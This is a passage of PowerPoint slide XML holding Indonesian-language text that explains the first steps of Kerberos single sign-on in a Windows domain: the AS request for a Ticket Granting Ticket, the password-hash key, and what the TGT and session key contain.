            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> domain Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langkah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SSO Kerberos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server KDC, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diimplementasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> domain.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Prinsipal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengirimkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (AS) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Tiket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pemberian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Tiket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (TGT). Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengenkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanggal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hash kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kuncinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>Nb. Hash kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sendiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dikirimkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Meskipun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> kami </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>mengacu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> pada kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>kesederhanaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>autentikator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> lain, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> login </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>kartu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>pintar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>AS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memeriksa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apakah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memecahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencocokkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hash kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di basis data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Direktori</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Aktif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>belum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kedaluwarsa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> valid, AS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merespons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Ticket Granting Ticket (TGT) - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (nama dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IP) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditambah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>stempel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan masa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berlaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dienkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rahasia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> KDC.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TGS-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengkomunikasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pemberian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Tiket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (TGS). Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dienkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>TGT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> token </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>logis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TGT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Anda dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengonfirmasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> - TGT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>apa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pun.</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83</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
